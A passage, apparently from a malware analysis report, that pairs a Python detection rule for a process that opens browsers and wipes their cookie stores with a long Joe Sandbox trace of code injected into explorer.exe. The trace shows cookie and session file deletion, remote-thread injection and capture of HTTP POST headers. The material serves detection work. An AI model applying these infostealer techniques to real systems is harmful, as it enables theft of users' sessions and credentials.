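    and deleted a cookie store. Browsers deleting their own files are ignored."""
    by_source = defaultdict(lambda: {"browsers": set(), "deleted": []})
    for ev in events:
        if ev["EventID"] == 10:                                   # ProcessAccess
            src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
            granted = int(ev["GrantedAccess"], 16)
            if (tgt in BROWSER_IMAGES and src not in BROWSER_IMAGES
                    and granted & PROCESS_QUERY_LIMITED_INFORMATION):
                by_source[src]["browsers"].add(tgt)
        elif ev["EventID"] in (23, 26):                           # FileDelete(Detected)
            img = basename(ev["Image"])
            if img not in BROWSER_IMAGES and is_cookie_store(ev["TargetFilename"]):
                by_source[img]["deleted"].append(ev["TargetFilename"])
    return [{"source": src, "browsers": sorted(d["browsers"]), "deleted": d["deleted"]}
            for src, d in by_source.items() if d["browsers"] and d["deleted"]]


# Constructed events (not from the report) covering the positive case and
# three things that must not fire: a benign query-only access, a browser
# deleting its own journal file, and a Cookies-named file outside a profile.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": "C:\\Windows\\explorer.exe",
     "TargetImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe",
     "TargetImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": "C:\\Windows\\explorer.exe",
     "TargetImage": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
     "GrantedAccess": "0x1410"},
    {"EventID": 23, "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies"},
    {"EventID": 23, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "TargetFilename": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies-journal"},
    {"EventID": 23, "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\user\\Documents\\Cookies.txt"},
]

if __name__ == "__main__":
    for finding in detect_cookie_wipe(SAMPLE_EVENTS):
        print(finding)
```

The correlation is keyed on the pair of behaviours rather than on explorer.exe itself, because the injected host process is an implementation detail of this sample; a rule that only alerts on Explorer touching `Cookies` would miss the same plugin hosted elsewhere, while a rule that only looks at 0x1000 handle opens to browsers would fire on every monitoring agent. Chrome's own maintenance of `Cookies-journal` is the expected benign deleter and is excluded by image name, not by path.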

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00161374
                                                                                                                                                        • Part of subcall function 00161363: Process32First.KERNEL32(00000000,?), ref: 00161393
                                                                                                                                                        • Part of subcall function 00161363: CloseHandle.KERNELBASE(00000000), ref: 001613CB
                                                                                                                                                        • Part of subcall function 00161363: lstrcmpiA.KERNEL32(?), ref: 001613A3
                                                                                                                                                        • Part of subcall function 00161363: Process32Next.KERNEL32(00000000,00000128), ref: 001613C0
                                                                                                                                                      • Sleep.KERNELBASE(000003E8,?,00000000,?,0016382F,?,00163C53,00000001), ref: 001635FA
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,0016382F,?,00163C53,00000001), ref: 00163613
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,0016382F,?,00163C53,00000001), ref: 00163623
                                                                                                                                                      • wsprintfW.USER32 ref: 00163644
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 0016150D
                                                                                                                                                        • Part of subcall function 001614D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 00161557
                                                                                                                                                        • Part of subcall function 001614D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
                                                                                                                                                        • Part of subcall function 001614D8: DeleteFileW.KERNELBASE(00000000), ref: 00161571
                                                                                                                                                        • Part of subcall function 001614D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
                                                                                                                                                        • Part of subcall function 001614D8: FindClose.KERNELBASE(00000000), ref: 0016158F
                                                                                                                                                        • Part of subcall function 00161011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,001614CB), ref: 00161020
                                                                                                                                                        • Part of subcall function 00161011: HeapFree.KERNEL32(00000000), ref: 00161027
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,0016382F,?,00163C53,00000001), ref: 00163672
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00164614,?,00000000,?,0016382F,?,00163C53,00000001), ref: 00163682
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                                                                                                                      • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                                                                                                                      • API String ID: 2436889709-3669280581
                                                                                                                                                      • Opcode ID: d1391991b28f5d5e35f570824c723ef2878f975eda264c5619e1751f517d1d85
                                                                                                                                                      • Instruction ID: 0159754c813339e4e2bcab63030701be95815dd96d44282a52873f84680c937e
                                                                                                                                                      • Opcode Fuzzy Hash: d1391991b28f5d5e35f570824c723ef2878f975eda264c5619e1751f517d1d85
                                                                                                                                                      • Instruction Fuzzy Hash: 8C11C0303842503BFB1427659D9AF7E259ADBE7F42F490028F707AA2C1CFD459E0927A

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00161374
                                                                                                                                                        • Part of subcall function 00161363: Process32First.KERNEL32(00000000,?), ref: 00161393
                                                                                                                                                        • Part of subcall function 00161363: CloseHandle.KERNELBASE(00000000), ref: 001613CB
                                                                                                                                                      • Sleep.KERNELBASE(000003E8,?,00000000,?,00163834,?,00163C53,00000001), ref: 001636B3
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,00163834,?,00163C53,00000001), ref: 001636CC
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,00163834,?,00163C53,00000001), ref: 001636DC
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 0016150D
                                                                                                                                                        • Part of subcall function 001614D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 00161557
                                                                                                                                                        • Part of subcall function 001614D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
                                                                                                                                                        • Part of subcall function 001614D8: DeleteFileW.KERNELBASE(00000000), ref: 00161571
                                                                                                                                                        • Part of subcall function 001614D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
                                                                                                                                                        • Part of subcall function 001614D8: FindClose.KERNELBASE(00000000), ref: 0016158F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                                                                                                                      • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                                                                                                                      • API String ID: 2731919298-637609321
                                                                                                                                                      • Opcode ID: e409420252805669da90e9aadc14970441a093cb46c9a05a5e8b9cdd24bf172d
                                                                                                                                                      • Instruction ID: 05897aa3c0ffa23e70aae787350685a08262b0e556066676a5eb46735a3a52a5
                                                                                                                                                      • Opcode Fuzzy Hash: e409420252805669da90e9aadc14970441a093cb46c9a05a5e8b9cdd24bf172d
                                                                                                                                                      • Instruction Fuzzy Hash: 7EF0A021300120339A18336A9D0AD7F195ECBF7B52704012CF206A36D1CF9409A292B9

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Control-flow graph (basic blocks, with the API or call they contain and their successor blocks):
                                                                                                                                                      • 279: 161363-16137f CreateToolhelp32Snapshot -> 280, 281
                                                                                                                                                      • 280: 1613d1-1613d6
                                                                                                                                                      • 281: 161381-161399 Process32First -> 282
                                                                                                                                                      • 282: 1613c6-1613c8 -> 283, 284
                                                                                                                                                      • 283: 1613ca-1613cb CloseHandle -> 280
                                                                                                                                                      • 284: 16139b-1613ab lstrcmpiA -> 285, 286
                                                                                                                                                      • 285: 1613ad-1613b3 call 16133f -> 286
                                                                                                                                                      • 286: 1613b8-1613c0 Process32Next -> 282
                                                                                                                                                      APIs
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00161374
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00161393
                                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 001613A3
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 001613C0
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 001613CB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 868014591-0
                                                                                                                                                      • Opcode ID: ac9f495cf72dc7cfb2839ec61b8982f19557aec10e464d0a2570b2f574f4a30a
                                                                                                                                                      • Instruction ID: 4f798629ff4a81150c75ac77a2418eace582493b88ef1b295438559f170fe60e
                                                                                                                                                      • Opcode Fuzzy Hash: ac9f495cf72dc7cfb2839ec61b8982f19557aec10e464d0a2570b2f574f4a30a
                                                                                                                                                      • Instruction Fuzzy Hash: 41F0C835501124ABD7205B259C08BEE77BCFB09331F0001A0F95AD2690EBB44DA48A90

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Control-flow graph (basic blocks, with the API they contain and their successor blocks):
                                                                                                                                                      • 310: 161235-161247 OpenFileMappingA -> 311, 312
                                                                                                                                                      • 311: 16125c-161260
                                                                                                                                                      • 312: 161249-161259 MapViewOfFile -> 311
                                                                                                                                                      APIs
                                                                                                                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0016123F
                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00163C33), ref: 00161251
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                                      • Opcode ID: 1e165c21ef88c5830e4c27f431c2af09c916d7dcc92e3992bd13f6a155a77f88
                                                                                                                                                      • Instruction ID: da82cd8fb2e7fc0f8f4edb7d2c8708e183f6faa28f9d52bf170ddbec5376f303
                                                                                                                                                      • Opcode Fuzzy Hash: 1e165c21ef88c5830e4c27f431c2af09c916d7dcc92e3992bd13f6a155a77f88
                                                                                                                                                      • Instruction Fuzzy Hash: E2D017327052317BE3301BBB6C0CF836E9DDF86AE1B054129F60AD2150D6A08860C2F0

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Control-flow graph (single basic block):
                                                                                                                                                      • 318: 1615a9-1615bd SetFileAttributesW, DeleteFileW
                                                                                                                                                      APIs
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,0016168B), ref: 001615AF
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 001615B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AttributesDelete
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2910425767-0
                                                                                                                                                      • Opcode ID: 743ccbb65f72696cce13965bed527d81ec338f7ac5eee066d1f036bbc51776e5
                                                                                                                                                      • Instruction ID: ea21a719a315c3645538a621d64f3b161bdf8606de1e500bbcbba49d313e16eb
                                                                                                                                                      • Opcode Fuzzy Hash: 743ccbb65f72696cce13965bed527d81ec338f7ac5eee066d1f036bbc51776e5
                                                                                                                                                      • Instruction Fuzzy Hash: FBB09232006530ABD6112B14BC0DBCE2658EF0A211B050142F701914518BD41A8286EA

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Control-flow graph (single basic block):
                                                                                                                                                      • 319: 161000-161010 GetProcessHeap, RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: 0d1d1afc0aa975ed5d65811fe49db4050f156b6c52e0050208d2476c973625fd
                                                                                                                                                      • Instruction ID: c3837d33c8a142d6d8ce16662d87e847769cb51aad271ee81ec74b761cdcffcf
                                                                                                                                                      • Opcode Fuzzy Hash: 0d1d1afc0aa975ed5d65811fe49db4050f156b6c52e0050208d2476c973625fd
                                                                                                                                                      • Instruction Fuzzy Hash: 2EA012B14041205BDE0017A0BC0DB593518B741301F008004F34681450CDE000548720

                                                                                                                                                      Control-flow Graph

APIs
  • Part of subcall function 00161274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00161281
• OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,771AE800), ref: 0016201A
• NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00162055
• NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001620E5
• RtlMoveMemory.NTDLL(00000000,001650A0,00000016), ref: 0016210C
• RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00162134
• NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00162144
• CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0016215E
• GetLastError.KERNEL32 ref: 00162166
• CloseHandle.KERNEL32(00000000), ref: 00162174
• Sleep.KERNEL32(000003E8), ref: 0016217B
• GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00162191
• GetProcAddress.KERNEL32(00000000), ref: 00162198
• ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001621AE
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001621D8
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001621EB
• CloseHandle.KERNEL32(00000000), ref: 001621F2
• Sleep.KERNEL32(000001F4), ref: 001621F9
• WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0016220D
• CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00162224
• CloseHandle.KERNEL32(00000000), ref: 00162231
• CloseHandle.KERNEL32(?), ref: 00162237
• CloseHandle.KERNEL32(?), ref: 0016223D
• CloseHandle.KERNEL32(00000000), ref: 00162240
Memory Dump Source
• Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_161000_explorer.jbxd
Similarity
• API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
• String ID: 0-vw$atan$ntdll$opera_shared_counter
• API String ID: 1066286714-3265138137
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 001611A9
• CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001611C1
• lstrlen.KERNEL32(?,00000000), ref: 001611C9
• CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001611D4
• CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 001611EE
• wsprintfA.USER32 ref: 00161205
• CryptDestroyHash.ADVAPI32(?), ref: 0016121E
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 00161228
Memory Dump Source
• Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_161000_explorer.jbxd
Similarity
• API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
• String ID: %02X
• API String ID: 3341110664-436463671
APIs
• GetCurrentProcessId.KERNEL32 ref: 001616D9
• GetCurrentThreadId.KERNEL32 ref: 001616E1
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001616F1
• Thread32First.KERNEL32(00000000,0000001C), ref: 001616FF
• OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0016171E
• SuspendThread.KERNEL32(00000000), ref: 0016172E
• CloseHandle.KERNEL32(00000000), ref: 0016173D
• Thread32Next.KERNEL32(00000000,0000001C), ref: 0016174D
• CloseHandle.KERNEL32(00000000), ref: 00161758
Memory Dump Source
• Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_161000_explorer.jbxd
Similarity
• API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
• String ID:
• API String ID: 1467098526-0
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00162EC5), ref: 00162E27
  • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
  • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
• NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00162E52
• NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00162E7F
• StrStrIW.SHLWAPI(?,NetworkService), ref: 00162E92
  • Part of subcall function 00161011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,001614CB), ref: 00161020
  • Part of subcall function 00161011: HeapFree.KERNEL32(00000000), ref: 00161027
Memory Dump Source
• Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_161000_explorer.jbxd
Similarity
• API ID: Process$Heap$InformationQuery$AllocateFreeOpen
• String ID: NetworkService
• API String ID: 1656241333-2019834739
APIs
  • Part of subcall function 00161141: lstrlen.KERNEL32(?,?,?,00000000,?,001629DD,00000001), ref: 00161150
  • Part of subcall function 00161141: lstrlen.KERNEL32(:method POST,?,00000000,?,001629DD,00000001), ref: 00161155
  • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
  • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
  • Part of subcall function 0016104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00162A16,?,00000001), ref: 00161056
  • Part of subcall function 0016285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 001628A2
• lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00162A4A
• lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00162A6C
• lstrcat.KERNEL32(?,dyn_header_ua), ref: 00162A8D
• RtlZeroMemory.NTDLL(?,0000000A), ref: 00162A96
• StrToIntA.SHLWAPI(00000000), ref: 00162AB9
• wnsprintfA.SHLWAPI ref: 00162B0D
• lstrcat.KERNEL32(00000000,?), ref: 00162B2D
• lstrcat.KERNEL32(00000000,{:!:}), ref: 00162B35
• lstrcat.KERNEL32(00000000,?), ref: 00162B3C
Memory Dump Source
• Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_161000_explorer.jbxd
Similarity
• API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
• String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
• API String ID: 2605944266-950501416
APIs
  • Part of subcall function 00161141: lstrlen.KERNEL32(?,?,?,00000000,?,001629DD,00000001), ref: 00161150
  • Part of subcall function 00161141: lstrlen.KERNEL32(:method POST,?,00000000,?,001629DD,00000001), ref: 00161155
• RtlZeroMemory.NTDLL(?,0000000A), ref: 00162FFA
• StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00163347), ref: 00163024
• lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00163347), ref: 00163052
• wsprintfA.USER32 ref: 001630B9
• lstrcat.KERNEL32(00000000,00000000), ref: 001630E5
• lstrcat.KERNEL32(?,{:!:}), ref: 001630F8
• lstrlen.KERNEL32(?,?,?,?,?,?,?,00166038), ref: 00163109
• RtlMoveMemory.NTDLL(00000000), ref: 00163112
  • Part of subcall function 00161011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,001614CB), ref: 00161020
  • Part of subcall function 00161011: HeapFree.KERNEL32(00000000), ref: 00161027
Memory Dump Source
• Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_161000_explorer.jbxd
Similarity
• API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
• String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
• API String ID: 2886538537-1627781280
APIs
• lstrlen.KERNEL32(00000000), ref: 0016322D
• wsprintfA.USER32 ref: 0016329E
• lstrcat.KERNEL32(00000000,00000000), ref: 001632AF
• lstrcat.KERNEL32(00000000,{:!:}), ref: 001632BE
• lstrlen.KERNEL32(00000000), ref: 001632C1
• RtlMoveMemory.NTDLL(00000000,?,?), ref: 001632D2
  • Part of subcall function 00161011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,001614CB), ref: 00161020
  • Part of subcall function 00161011: HeapFree.KERNEL32(00000000), ref: 00161027
Memory Dump Source
• Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                                                                                                                      • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                                                                                                                      • API String ID: 3430864794-1604029033
                                                                                                                                                      • Opcode ID: 3b14929f01a8f0bbf0179fe7aaa8db5e9a633650968affd2e9fd42d7f6e50d08
                                                                                                                                                      • Instruction ID: 56dec84b94aec413839ddf3d9fb87ae2c7453c5ac3255fb9edcc0bab36c59c3b
                                                                                                                                                      • Opcode Fuzzy Hash: 3b14929f01a8f0bbf0179fe7aaa8db5e9a633650968affd2e9fd42d7f6e50d08
                                                                                                                                                      • Instruction Fuzzy Hash: 0B419E71108345BFD311DF10DC49EABBBECFB98345F04092EF95292251DBB59A98CBA2
                                                                                                                                                      APIs
                                                                                                                                                      • RtlEnterCriticalSection.NTDLL(00166038), ref: 00163455
                                                                                                                                                      • lstrcat.KERNEL32 ref: 001634AB
                                                                                                                                                        • Part of subcall function 00162FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00162FFA
                                                                                                                                                        • Part of subcall function 00162FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00163347), ref: 00163024
                                                                                                                                                        • Part of subcall function 00162FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00163347), ref: 00163052
                                                                                                                                                        • Part of subcall function 00162FAA: wsprintfA.USER32 ref: 001630B9
                                                                                                                                                        • Part of subcall function 00162FAA: lstrcat.KERNEL32(00000000,00000000), ref: 001630E5
                                                                                                                                                        • Part of subcall function 00162F1F: CreateThread.KERNEL32(00000000,00000000,00162ED2,?,00000000,00000000), ref: 00162F2F
                                                                                                                                                        • Part of subcall function 00162F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00162F36
                                                                                                                                                        • Part of subcall function 0016105D: VirtualFree.KERNEL32(?,00000000,00008000,00162B4B), ref: 00161065
                                                                                                                                                      • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00163504
                                                                                                                                                      • StrToIntA.SHLWAPI(?,00000000,?), ref: 0016352B
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0016358D
                                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(00166038), ref: 001635C1
                                                                                                                                                        • Part of subcall function 00161274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00161281
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                                                                                                                      • String ID: $Content-Length:$POST
                                                                                                                                                      • API String ID: 2960674810-114478848
                                                                                                                                                      • Opcode ID: 1a6a7c05c0325488ac3b03c134308e6caebdd93f10c17a9ed4ef32530efa9a3a
                                                                                                                                                      • Instruction ID: 809931c6db6d8cc8bdc8c6f63087e7fe65ee0664176b6a492e38ef82e96453a7
                                                                                                                                                      • Opcode Fuzzy Hash: 1a6a7c05c0325488ac3b03c134308e6caebdd93f10c17a9ed4ef32530efa9a3a
                                                                                                                                                      • Instruction Fuzzy Hash: 46310631604341ABCB05EF64EE696AA7BA9EB95341F04003DF91397752CFB4C9ACCB91
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                        • Part of subcall function 0016106C: lstrlen.KERNEL32(?,?,00000000,00000000,0016189F,771A8A60,?,00000000), ref: 00161074
                                                                                                                                                        • Part of subcall function 0016106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00161086
                                                                                                                                                        • Part of subcall function 001617DC: RtlZeroMemory.NTDLL(?,00000018), ref: 001617EE
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 001618FB
                                                                                                                                                      • wsprintfW.USER32 ref: 001619F2
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00161AD0
                                                                                                                                                      Strings
